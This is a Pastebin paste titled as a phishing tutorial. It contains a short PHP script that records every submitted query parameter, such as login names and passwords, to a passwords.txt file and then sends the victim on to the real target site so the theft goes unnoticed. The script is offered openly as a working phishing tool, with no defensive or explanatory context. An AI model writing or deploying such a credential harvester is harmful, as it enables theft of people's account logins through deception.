Advertisement
flazer

phising totur by flazer

May 25th, 2012
194
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.33 KB | None | 0 0
  1. <?php
  2.  
  3. header("Location: http://situs-targetnya.com");
  4.  
  5. $handle = fopen("passwords.txt", "a");
  6.  
  7. foreach($_GET as $variable => $value) {
  8.  
  9. fwrite($handle, $variable);
  10.  
  11. fwrite($handle, "=");
  12.  
  13. fwrite($handle, $value);
  14.  
  15. fwrite($handle, "\r\n");
  16.  
  17. }
  18.  
  19. fwrite($handle, "\r\n");
  20.  
  21. fclose($handle);
  22.  
  23. exit;
  24.  
  25. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement